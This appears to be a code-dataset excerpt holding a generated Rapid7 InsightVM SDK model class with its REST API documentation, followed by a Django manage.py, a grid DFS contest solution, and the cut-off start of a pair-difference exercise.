### Instance Resources Instance resources can support the `GET`, `PUT`, `POST`, `PATCH` and `DELETE` operations. #### GET Retrieves the details of a specific resource by its identifier. The details retrieved can be controlled through property selection and property views. The content of the resource is returned within the body of the response in the acceptable media type. #### PUT Allows for and idempotent \"full update\" (complete replacement) on a specific resource. If the resource does not exist, it will be created; if it does exist, it is completely overwritten. Any omitted properties in the request are assumed to be undefined/null. For \"partial updates\" use `POST` or `PATCH` instead. The content of the `PUT` request is sent in the request body. The identifier of the resource is specified within the URL (not the request body). The response to a successful `PUT` request is a `201 CREATED` to represent the created status, with a valid `Location` header field set to the URI that can be used to access to the newly created (or fully replaced) resource. #### POST Performs a non-idempotent creation of a new resource. The `POST` of an instance resource most commonly occurs with the use of nested resources (e.g. searching on a parent collection resource). The response to a `POST` of an instance resource is typically a `200 OK` if the resource is non-persistent, and a `201 CREATED` if there is a resource created/persisted as a result of the operation. This varies by endpoint. #### PATCH The `PATCH` operation is used to perform a partial update of a resource. `PATCH` is a non-idempotent operation that enforces an atomic mutation of a resource. Only the properties specified in the request are to be overwritten on the resource it is applied to. If a property is missing, it is assumed to not have changed. #### DELETE Permanently removes the individual resource from the system. If the resource is an association between resources, only the association is removed, not the resources themselves. A successful deletion of the resource should return `204 NO CONTENT` with no response body. This operation is not fully idempotent, as follow-up requests to delete a non-existent resource should return a `404 NOT FOUND`. ## Requests Unless otherwise indicated, the default request body media type is `application/json`. ### Headers Commonly used request headers include: | Header | Example | Purpose | | ------------------ | --------------------------------------------- | ---------------------------------------------------------------------------------------------- | | `Accept` | `application/json` | Defines what acceptable content types are allowed by the client. For all types, use `*/*`. | | `Accept-Encoding` | `deflate, gzip` | Allows for the encoding to be specified (such as gzip). | | `Accept-Language` | `en-US` | Indicates to the server the client's locale (defaults `en-US`). | | `Authorization ` | `Basic Base64(\"username:password\")` | Basic authentication | | `Token ` | `123456` | Two-factor authentication token (if enabled) | ### Dates & Times Dates and/or times are specified as strings in the ISO 8601 format(s). 
The following formats are supported as input: | Value | Format | Notes | | --------------------------- | ------------------------------------------------------ | ----------------------------------------------------- | | Date | YYYY-MM-DD | Defaults to 12 am UTC (if used for a date & time | | Date & time only | YYYY-MM-DD'T'hh:mm:ss[.nnn] | Defaults to UTC | | Date & time in UTC | YYYY-MM-DD'T'hh:mm:ss[.nnn]Z | | | Date & time w/ offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm | | | Date & time w/ zone-offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm[<zone-id>] | | ### Timezones Timezones are specified in the regional zone format, such as `\"America/Los_Angeles\"`, `\"Asia/Tokyo\"`, or `\"GMT\"`. ### Paging Pagination is supported on certain collection resources using a combination of two query parameters, `page` and `size`. As these are control parameters, they are prefixed with the underscore character. The page parameter dictates the zero-based index of the page to retrieve, and the `size` indicates the size of the page. For example, `/resources?page=2&size=10` will return page 3, with 10 records per page, giving results 21-30. The maximum page size for a request is 500. ### Sorting Sorting is supported on paginated resources with the `sort` query parameter(s). The sort query parameter(s) supports identifying a single or multi-property sort with a single or multi-direction output. The format of the parameter is: ``` sort=property[,ASC|DESC]... ``` Therefore, the request `/resources?sort=name,title,DESC` would return the results sorted by the name and title descending, in that order. The sort directions are either ascending `ASC` or descending `DESC`. With single-order sorting, all properties are sorted in the same direction. To sort the results with varying orders by property, multiple sort parameters are passed. For example, the request `/resources?sort=name,ASC&sort=title,DESC` would sort by name ascending and title descending, in that order. ## Responses The following response statuses may be returned by this API. | Status | Meaning | Usage | | ------ | ------------------------ |------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `200` | OK | The operation performed without error according to the specification of the request, and no more specific 2xx code is suitable. | | `201` | Created | A create request has been fulfilled and a resource has been created. The resource is available as the URI specified in the response, including the `Location` header. | | `202` | Accepted | An asynchronous task has been accepted, but not guaranteed, to be processed in the future. | | `400` | Bad Request | The request was invalid or cannot be otherwise served. The request is not likely to succeed in the future without modifications. | | `401` | Unauthorized | The user is unauthorized to perform the operation requested, or does not maintain permissions to perform the operation on the resource specified. | | `403` | Forbidden | The resource exists to which the user has access, but the operating requested is not permitted. | | `404` | Not Found | The resource specified could not be located, does not exist, or an unauthenticated client does not have permissions to a resource. | | `405` | Method Not Allowed | The operations may not be performed on the specific resource. Allowed operations are returned and may be performed on the resource. 
| | `408` | Request Timeout | The client has failed to complete a request in a timely manner and the request has been discarded. | | `413` | Request Entity Too Large | The request being provided is too large for the server to accept processing. | | `415` | Unsupported Media Type | The media type is not supported for the requested resource. | | `500` | Internal Server Error | An internal and unexpected error has occurred on the server at no fault of the client. | ### Security The response statuses 401, 403 and 404 need special consideration for security purposes. As necessary, error statuses and messages may be obscured to strengthen security and prevent information exposure. The following is a guideline for privileged resource response statuses: | Use Case | Access | Resource | Permission | Status | | ------------------------------------------------------------------ | ------------------ |------------------- | ------------ | ------------ | | Unauthenticated access to an unauthenticated resource. | Unauthenticated | Unauthenticated | Yes | `20x` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Authenticated | No | `401` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Non-existent | No | `401` | | Authenticated access to a unauthenticated resource. | Authenticated | Unauthenticated | Yes | `20x` | | Authenticated access to an authenticated, unprivileged resource. | Authenticated | Authenticated | No | `404` | | Authenticated access to an authenticated, privileged resource. | Authenticated | Authenticated | Yes | `20x` | | Authenticated access to an authenticated, non-existent resource | Authenticated | Non-existent | Yes | `404` | ### Headers Commonly used response headers include: | Header | Example | Purpose | | -------------------------- | --------------------------------- | --------------------------------------------------------------- | | `Allow` | `OPTIONS, GET` | Defines the allowable HTTP operations on a resource. | | `Cache-Control` | `no-store, must-revalidate` | Disables caching of resources (as they are all dynamic). | | `Content-Encoding` | `gzip` | The encoding of the response body (if any). | | `Location` | | Refers to the URI of the resource created by a request. | | `Transfer-Encoding` | `chunked` | Specified the encoding used to transform response. | | `Retry-After` | 5000 | Indicates the time to wait before retrying a request. | | `X-Content-Type-Options` | `nosniff` | Disables MIME type sniffing. | | `X-XSS-Protection` | `1; mode=block` | Enables XSS filter protection. | | `X-Frame-Options` | `SAMEORIGIN` | Prevents rendering in a frame from a different origin. | | `X-UA-Compatible` | `IE=edge,chrome=1` | Specifies the browser mode to render in. | ### Format When `application/json` is returned in the response body it is always pretty-printed (indented, human readable output). Additionally, gzip compression/encoding is supported on all responses. #### Dates & Times Dates or times are returned as strings in the ISO 8601 'extended' format. When a date and time is returned (instant) the value is converted to UTC. For example: | Value | Format | Example | | --------------- | ------------------------------ | --------------------- | | Date | `YYYY-MM-DD` | 2017-12-03 | | Date & Time | `YYYY-MM-DD'T'hh:mm:ss[.nnn]Z` | 2017-12-03T10:15:30Z | #### Content In some resources a Content data type is used. This allows for multiple formats of representation to be returned within resource, specifically `\"html\"` and `\"text\"`. 
The `\"text\"` property returns a flattened representation suitable for output in textual displays. The `\"html\"` property returns an HTML fragment suitable for display within an HTML element. Note, the HTML returned is not a valid stand-alone HTML document. #### Paging The response to a paginated request follows the format: ```json { resources\": [ ... ], \"page\": { \"number\" : ..., \"size\" : ..., \"totalResources\" : ..., \"totalPages\" : ... }, \"links\": [ \"first\" : { \"href\" : \"...\" }, \"prev\" : { \"href\" : \"...\" }, \"self\" : { \"href\" : \"...\" }, \"next\" : { \"href\" : \"...\" }, \"last\" : { \"href\" : \"...\" } ] } ``` The `resources` property is an array of the resources being retrieved from the endpoint, each which should contain at minimum a \"self\" relation hypermedia link. The `page` property outlines the details of the current page and total possible pages. The object for the page includes the following properties: - number - The page number (zero-based) of the page returned. - size - The size of the pages, which is less than or equal to the maximum page size. - totalResources - The total amount of resources available across all pages. - totalPages - The total amount of pages. The last property of the paged response is the `links` array, which contains all available hypermedia links. For paginated responses, the \"self\", \"next\", \"previous\", \"first\", and \"last\" links are returned. The \"self\" link must always be returned and should contain a link to allow the client to replicate the original request against the collection resource in an identical manner to that in which it was invoked. The \"next\" and \"previous\" links are present if either or both there exists a previous or next page, respectively. The \"next\" and \"previous\" links have hrefs that allow \"natural movement\" to the next page, that is all parameters required to move the next page are provided in the link. The \"first\" and \"last\" links provide references to the first and last pages respectively. Requests outside the boundaries of the pageable will result in a `404 NOT FOUND`. Paginated requests do not provide a \"stateful cursor\" to the client, nor does it need to provide a read consistent view. Records in adjacent pages may change while pagination is being traversed, and the total number of pages and resources may change between requests within the same filtered/queries resource collection. #### Property Views The \"depth\" of the response of a resource can be configured using a \"view\". All endpoints supports two views that can tune the extent of the information returned in the resource. The supported views are `summary` and `details` (the default). View are specified using a query parameter, in this format: ```bash /<resource>?view={viewName} ``` #### Error Any error responses can provide a response body with a message to the client indicating more information (if applicable) to aid debugging of the error. All 40x and 50x responses will return an error response in the body. The format of the response is as follows: ```json { \"status\": <statusCode>, \"message\": <message>, \"links\" : [ { \"rel\" : \"...\", \"href\" : \"...\" } ] } ``` The `status` property is the same as the HTTP status returned in the response, to ease client parsing. The message property is a localized message in the request client's locale (if applicable) that articulates the nature of the error. The last property is the `links` property. 
This may contain additional [hypermedia links](#section/Overview/Authentication) to troubleshoot. #### Search Criteria <a section=\"section/Responses/SearchCriteria\"></a> Multiple resources make use of search criteria to match assets. Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The operator is a type and property-specific operating performed on the filtered property. The valid values for fields and operators are outlined in the table below. Every filter also defines one or more values that are supplied to the operator. The valid values vary by operator and are outlined below. ##### Fields The following table outlines the search criteria fields and the available operators: | Field | Operators | | --------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ | | `alternate-address-type` | `in` | | `container-image` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-like` ` not-like` | | `container-status` | `is` ` is-not` | | `containers` | `are` | | `criticality-tag` | `is` ` is-not` ` is-greater-than` ` is-less-than` ` is-applied` ` is-not-applied` | | `custom-tag` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-applied` ` is-not-applied` | | `cve` | `is` ` is-not` ` contains` ` does-not-contain` | | `cvss-access-complexity` | `is` ` is-not` | | `cvss-authentication-required` | `is` ` is-not` | | `cvss-access-vector` | `is` ` is-not` | | `cvss-availability-impact` | `is` ` is-not` | | `cvss-confidentiality-impact` | `is` ` is-not` | | `cvss-integrity-impact` | `is` ` is-not` | | `cvss-v3-confidentiality-impact` | `is` ` is-not` | | `cvss-v3-integrity-impact` | `is` ` is-not` | | `cvss-v3-availability-impact` | `is` ` is-not` | | `cvss-v3-attack-vector` | `is` ` is-not` | | `cvss-v3-attack-complexity` | `is` ` is-not` | | `cvss-v3-user-interaction` | `is` ` is-not` | | `cvss-v3-privileges-required` | `is` ` is-not` | | `host-name` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-empty` ` is-not-empty` ` is-like` ` not-like` | | `host-type` | `in` ` not-in` | | `ip-address` | `is` ` is-not` ` in-range` ` not-in-range` ` is-like` ` not-like` | | `ip-address-type` | `in` ` not-in` | | `last-scan-date` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `location-tag` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-applied` ` is-not-applied` | | `mobile-device-last-sync-time` | `is-within-the-last` ` is-earlier-than` | | `open-ports` | `is` ` is-not` ` in-range` | | `operating-system` | `contains` ` does-not-contain` ` is-empty` ` is-not-empty` | | `owner-tag` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-applied` ` is-not-applied` | | `pci-compliance` | `is` | | `risk-score` | `is` ` is-not` ` in-range` ` greater-than` ` less-than` | | `service-name` | `contains` ` does-not-contain` | | `site-id` | `in` ` not-in` | | `software` | `contains` ` does-not-contain` | | `vAsset-cluster` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | 
`vAsset-datacenter` | `is` ` is-not` | | `vAsset-host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `vAsset-power-state` | `in` ` not-in` | | `vAsset-resource-pool-path` | `contains` ` does-not-contain` | | `vulnerability-assessed` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `vulnerability-category` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` | | `vulnerability-cvss-v3-score` | `is` ` is-not` | | `vulnerability-cvss-score` | `is` ` is-not` ` in-range` ` is-greater-than` ` is-less-than` | | `vulnerability-exposures` | `includes` ` does-not-include` | | `vulnerability-title` | `contains` ` does-not-contain` ` is` ` is-not` ` starts-with` ` ends-with` | | `vulnerability-validated-status` | `are` | ##### Enumerated Properties The following fields have enumerated values: | Field | Acceptable Values | | ----------------------------------------- | ------------------------------------------------------------------------------------------------------------- | | `alternate-address-type` | 0=IPv4, 1=IPv6 | | `containers` | 0=present, 1=not present | | `container-status` | `created` `running` `paused` `restarting` `exited` `dead` `unknown` | | `cvss-access-complexity` | <ul><li><code>L</code> = Low</li><li><code>M</code> = Medium</li><li><code>H</code> = High</li></ul> | | `cvss-integrity-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-confidentiality-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-availability-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-access-vector` | <ul><li><code>L</code> = Local</li><li><code>A</code> = Adjacent</li><li><code>N</code> = Network</li></ul> | | `cvss-authentication-required` | <ul><li><code>N</code> = None</li><li><code>S</code> = Single</li><li><code>M</code> = Multiple</li></ul> | | `cvss-v3-confidentiality-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-integrity-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-availability-impact` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-attack-vector` | <ul><li><code>N</code> = Network</li><li><code>A</code> = Adjacent</li><li><code>L</code> = Local</li><li><code>P</code> = Physical</li></ul> | | `cvss-v3-attack-complexity` | <ul><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-user-interaction` | <ul><li><code>N</code> = None</li><li><code>R</code> = Required</li></ul> | | `cvss-v3-privileges-required` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `host-type` | 0=Unknown, 1=Guest, 2=Hypervisor, 3=Physical, 4=Mobile | | `ip-address-type` | 0=IPv4, 1=IPv6 | | `pci-compliance` | 0=fail, 1=pass | | `vulnerability-validated-status` | 0=present, 1=not present | ##### Operator Properties <a section=\"section/Responses/SearchCriteria/OperatorProperties\"></a> The following table outlines which properties are required for each operator and the appropriate data type(s): | Operator | `value` | `lower` | `upper` | | 
----------------------|-----------------------|-----------------------|-----------------------| | `are` | `string` | | | | `contains` | `string` | | | | `does-not-contain` | `string` | | | | `ends with` | `string` | | | | `in` | `Array[ string ]` | | | | `in-range` | | `numeric` | `numeric` | | `includes` | `Array[ string ]` | | | | `is` | `string` | | | | `is-applied` | | | | | `is-between` | | `numeric` | `numeric` | | `is-earlier-than` | `numeric` | | | | `is-empty` | | | | | `is-greater-than` | `numeric` | | | | `is-on-or-after` | `string` (yyyy-MM-dd) | | | | `is-on-or-before` | `string` (yyyy-MM-dd) | | | | `is-not` | `string` | | | | `is-not-applied` | | | | | `is-not-empty` | | | | | `is-within-the-last` | `numeric` | | | | `less-than` | `string` | | | | `like` | `string` | | | | `not-contains` | `string` | | | | `not-in` | `Array[ string ]` | | | | `not-in-range` | | `numeric` | `numeric` | | `not-like` | `string` | | | | `starts-with` | `string` | | | #### Discovery Connection Search Criteria <a section=\"section/Responses/DiscoverySearchCriteria\"></a> Dynamic sites make use of search criteria to match assets from a discovery connection. Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The list of supported fields vary depending on the type of discovery connection configured for the dynamic site (e.g vSphere, ActiveSync, etc.). The operator is a type and property-specific operating performed on the filtered property. The valid values for fields outlined in the tables below and are grouped by the type of connection. Every filter also defines one or more values that are supplied to the operator. See <a href=\"#section/Responses/SearchCriteria/OperatorProperties\">Search Criteria Operator Properties</a> for more information on the valid values for each operator. ##### Fields (ActiveSync) This section documents search criteria information for ActiveSync discovery connections. The discovery connections must be one of the following types: `\"activesync-ldap\"`, `\"activesync-office365\"`, or `\"activesync-powershell\"`. The following table outlines the search criteria fields and the available operators for ActiveSync connections: | Field | Operators | | --------------------------------- | ------------------------------------------------------------- | | `last-sync-time` | `is-within-the-last` ` is-earlier-than` | | `operating-system` | `contains` ` does-not-contain` | | `user` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (AWS) This section documents search criteria information for AWS discovery connections. The discovery connections must be the type `\"aws\"`. 
The following table outlines the search criteria fields and the available operators for AWS connections: | Field | Operators | | ----------------------- | ------------------------------------------------------------- | | `availability-zone` | `contains` ` does-not-contain` | | `guest-os-family` | `contains` ` does-not-contain` | | `instance-id` | `contains` ` does-not-contain` | | `instance-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `instance-state` | `in` ` not-in` | | `instance-type` | `in` ` not-in` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `region` | `in` ` not-in` | | `vpc-id` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (DHCP) This section documents search criteria information for DHCP discovery connections. The discovery connections must be the type `\"dhcp\"`. The following table outlines the search criteria fields and the available operators for DHCP connections: | Field | Operators | | --------------- | ------------------------------------------------------------- | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `mac-address` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (Sonar) This section documents search criteria information for Sonar discovery connections. The discovery connections must be the type `\"sonar\"`. The following table outlines the search criteria fields and the available operators for Sonar connections: | Field | Operators | | ------------------- | -------------------- | | `search-domain` | `contains` ` is` | | `ip-address` | `in-range` ` is` | | `sonar-scan-date` | `is-within-the-last` | ##### Fields (vSphere) This section documents search criteria information for vSphere discovery connections. The discovery connections must be the type `\"vsphere\"`. The following table outlines the search criteria fields and the available operators for vSphere connections: | Field | Operators | | -------------------- | ------------------------------------------------------------------------------------------ | | `cluster` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `data-center` | `is` ` is-not` | | `discovered-time` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `guest-os-family` | `contains` ` does-not-contain` | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `power-state` | `in` ` not-in` | | `resource-pool-path` | `contains` ` does-not-contain` | | `last-time-seen` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `vm` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Enumerated Properties (vSphere) The following fields have enumerated values: | Field | Acceptable Values | | ------------- | ------------------------------------ | | `power-state` | `poweredOn` `poweredOff` `suspended` | ## HATEOAS This API follows Hypermedia as the Engine of Application State (HATEOAS) principals and is therefore hypermedia friendly. Hyperlinks are returned in the `links` property of any given resource and contain a fully-qualified hyperlink to the corresponding resource. 
The format of the hypermedia link adheres to both the <a target=\"_blank\" href=\"http://jsonapi.org\">{json:api} v1</a> <a target=\"_blank\" href=\"http://jsonapi.org/format/#document-links\">\"Link Object\"</a> and <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html\">JSON Hyper-Schema</a> <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html#rfc.section.5.2\">\"Link Description Object\"</a> formats. For example: ```json \"links\": [{ \"rel\": \"<relation>\", \"href\": \"<href>\" ... }] ``` Where appropriate link objects may also contain additional properties than the `rel` and `href` properties, such as `id`, `type`, etc. See the [Root](#tag/Root) resources for the entry points into API discovery. # noqa: E501
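A hedged illustration (editor's addition, not part of the generated description): fetching one page of assets with Basic authentication, consistent with the paging and authentication conventions above. The host, port, and credentials are placeholders, and `requests` is an assumed dependency. ```python import requests  resp = requests.get(     "https://console.example.com:3780/api/3/assets",   # placeholder host/port     params={"page": 0, "size": 10},                    # zero-based paging     auth=("username", "password"),                     # Basic authentication     verify=False,  # only for a self-signed console certificate ) resp.raise_for_status() print(resp.json()["page"]) ```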
OpenAPI spec version: 3
Contact: support@rapid7.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from py_insightvm_sdk.models.swagger_discovery_search_criteria_filter import SwaggerDiscoverySearchCriteriaFilter # noqa: F401,E501
class DiscoverySearchCriteria(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'connection_type': 'str',
'filters': 'list[SwaggerDiscoverySearchCriteriaFilter]',
'match': 'str'
}
attribute_map = {
'connection_type': 'connectionType',
'filters': 'filters',
'match': 'match'
}
def __init__(self, connection_type=None, filters=None, match=None): # noqa: E501
"""DiscoverySearchCriteria - a model defined in Swagger""" # noqa: E501
self._connection_type = None
self._filters = None
self._match = None
self.discriminator = None
if connection_type is not None:
self.connection_type = connection_type
if filters is not None:
self.filters = filters
if match is not None:
self.match = match
@property
def connection_type(self):
"""Gets the connection_type of this DiscoverySearchCriteria. # noqa: E501
The type of discovery connection configured for the site. This property only applies to dynamic sites. # noqa: E501
:return: The connection_type of this DiscoverySearchCriteria. # noqa: E501
:rtype: str
"""
return self._connection_type
@connection_type.setter
def connection_type(self, connection_type):
"""Sets the connection_type of this DiscoverySearchCriteria.
The type of discovery connection configured for the site. This property only applies to dynamic sites. # noqa: E501
:param connection_type: The connection_type of this DiscoverySearchCriteria. # noqa: E501
:type: str
"""
allowed_values = ["activesync-ldap", "activesync-office365", "activesync-powershell", "aws", "dhcp", "sonar", "vsphere"] # noqa: E501
if connection_type not in allowed_values:
raise ValueError(
"Invalid value for `connection_type` ({0}), must be one of {1}" # noqa: E501
.format(connection_type, allowed_values)
)
self._connection_type = connection_type
@property
def filters(self):
"""Gets the filters of this DiscoverySearchCriteria. # noqa: E501
Filters used to match assets from a discovery connection. See <a href=\"#section/Responses/DiscoverySearchCriteria\">Discovery Connection Search Criteria</a> for more information on the structure and format. # noqa: E501
:return: The filters of this DiscoverySearchCriteria. # noqa: E501
:rtype: list[SwaggerDiscoverySearchCriteriaFilter]
"""
return self._filters
@filters.setter
def filters(self, filters):
"""Sets the filters of this DiscoverySearchCriteria.
Filters used to match assets from a discovery connection. See <a href=\"#section/Responses/DiscoverySearchCriteria\">Discovery Connection Search Criteria</a> for more information on the structure and format. # noqa: E501
:param filters: The filters of this DiscoverySearchCriteria. # noqa: E501
:type: list[SwaggerDiscoverySearchCriteriaFilter]
"""
self._filters = filters
@property
def match(self):
"""Gets the match of this DiscoverySearchCriteria. # noqa: E501
Operator to determine how to match filters. `all` requires that all filters match for an asset to be included. `any` requires only one filter to match for an asset to be included. # noqa: E501
:return: The match of this DiscoverySearchCriteria. # noqa: E501
:rtype: str
"""
return self._match
@match.setter
def match(self, match):
"""Sets the match of this DiscoverySearchCriteria.
Operator to determine how to match filters. `all` requires that all filters match for an asset to be included. `any` requires only one filter to match for an asset to be included. # noqa: E501
:param match: The match of this DiscoverySearchCriteria. # noqa: E501
:type: str
"""
allowed_values = ["any", "all"] # noqa: E501
if match not in allowed_values:
raise ValueError(
"Invalid value for `match` ({0}), must be one of {1}" # noqa: E501
.format(match, allowed_values)
)
self._match = match
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(DiscoverySearchCriteria, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DiscoverySearchCriteria):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
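# --- Editor's addition: a minimal, hedged usage sketch (not part of the
# generated SDK). It only exercises the setters and to_dict() defined above;
# the field values are example assumptions, not real connection data.
if __name__ == "__main__":
    criteria = DiscoverySearchCriteria(connection_type="vsphere", match="all")
    criteria.filters = []  # would hold SwaggerDiscoverySearchCriteriaFilter objects
    # Prints: {'connection_type': 'vsphere', 'filters': [], 'match': 'all'}
    print(criteria.to_dict())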
|
[
"greenpau@outlook.com"
] |
greenpau@outlook.com
|
82a746e5f60cd833d1722b8ad31c9a47ba6d461b
|
c1cadf7816acbe2c629dfdf5bfe8f35fa14bfd57
|
/archieve/chinese/manage.py
|
5ca0b7c52363f11fa49628eb6fd16998188a8760
|
[] |
no_license
|
luochengleo/timeperception
|
39c5eb0b0cedf16a02867e6a67e2befc4a118c71
|
6c27ceb51e219d9f18898918d4f3158c94836ff4
|
refs/heads/master
| 2021-01-21T04:46:45.315679
| 2016-07-21T14:34:04
| 2016-07-21T14:34:04
| 43,635,809
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "timeperception.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"luochengleo@gmail.com"
] |
luochengleo@gmail.com
|
c30b0daa268e1d472d04f23d05a26aa61c656f59
|
3f84f51751c4191bb81c9df7094578461fb12a2d
|
/典型90問/012_dfs.py
|
ab1e4b903f8a68201dac254f3a00b79daee48b9e
|
[] |
no_license
|
rikukawamura/atcoder
|
7ff49f1bd8534b99d87fe81ef950e1ba77eee8b8
|
09c0cfe3ce25be56d338614a29e996f4106117cd
|
refs/heads/master
| 2023-08-13T21:21:19.058219
| 2021-09-28T10:02:42
| 2021-09-28T10:02:42
| 329,206,601
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 896
|
py
|
import sys

# The grid DFS below can recurse up to H*W frames deep.
sys.setrecursionlimit(10**8)

def int_sp():
    return map(int, input().split())

def li_int_sp():
    return list(map(int, input().split()))

def dfs(s_y, s_x):
    # Stop at the border, at visited cells, and at cells that are not filled in.
    if s_y < 0 or H <= s_y or s_x < 0 or W <= s_x or visited[s_y][s_x] or maps[s_y][s_x] == 0:
        return
    visited[s_y][s_x] = 1
    for k in range(4):
        dfs(s_y + dy[k], s_x + dx[k])

H, W = int_sp()
Q = int(input())
maps = [[0] * W for _ in range(H)]
visited = [[0] * W for _ in range(H)]
dx = [0, 1, 0, -1]
dy = [1, 0, -1, 0]
for _ in range(Q):
    q = li_int_sp()
    if q[0] == 1:
        # Query type 1: fill cell (r, c), given 1-indexed.
        maps[q[1] - 1][q[2] - 1] = 1
    else:
        # Query type 2: are the two filled cells 4-directionally connected?
        start_y, start_x = q[1], q[2]
        goal_y, goal_x = q[3], q[4]
        dfs(start_y - 1, start_x - 1)
        if visited[goal_y - 1][goal_x - 1] == 1:
            print('Yes')
        else:
            print('No')
        visited = [[0] * W for _ in range(H)]
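# --- Editor's addition (hedged sketch, not called above): an equivalent
# iterative DFS. Deep recursion on an H*W grid can exhaust the interpreter's
# C stack even after sys.setrecursionlimit; an explicit stack avoids that.
def dfs_iter(s_y, s_x):
    stack = [(s_y, s_x)]
    while stack:
        y, x = stack.pop()
        if y < 0 or H <= y or x < 0 or W <= x or visited[y][x] or maps[y][x] == 0:
            continue
        visited[y][x] = 1
        for k in range(4):
            stack.append((y + dy[k], x + dx[k]))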
|
[
"49993650+rikukawamura@users.noreply.github.com"
] |
49993650+rikukawamura@users.noreply.github.com
|
f5ce0b8c0c2a1214e2899cfff23ea25f55ac12b1
|
c546184629526cff0d40180fc89158ea70c5e21c
|
/Basics of data science and machine learning/5. Tuples, Dictionary and sets/8. Pairs with difference K.py
|
68f7a31e266ceb68ab10d834ada99cfcc13e1541
|
[] |
no_license
|
code-drops/coding-ninjas
|
23ad5d3ea813caf3bd1b04a3733b38d3fb844669
|
fd320e1e4f9e996fbe8d2ef25b20d818b18d4d79
|
refs/heads/master
| 2022-11-23T00:22:31.791976
| 2020-07-05T10:22:00
| 2020-07-05T10:22:00
| 277,277,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 825
|
py
|
'''
You are given an array of integers and an integer K. Write a program to find and
print all pairs whose absolute difference is K.
'''
def printPairDiffK(List, k):
    # Build a value -> occurrence-count map (reversed(...) preserved from the
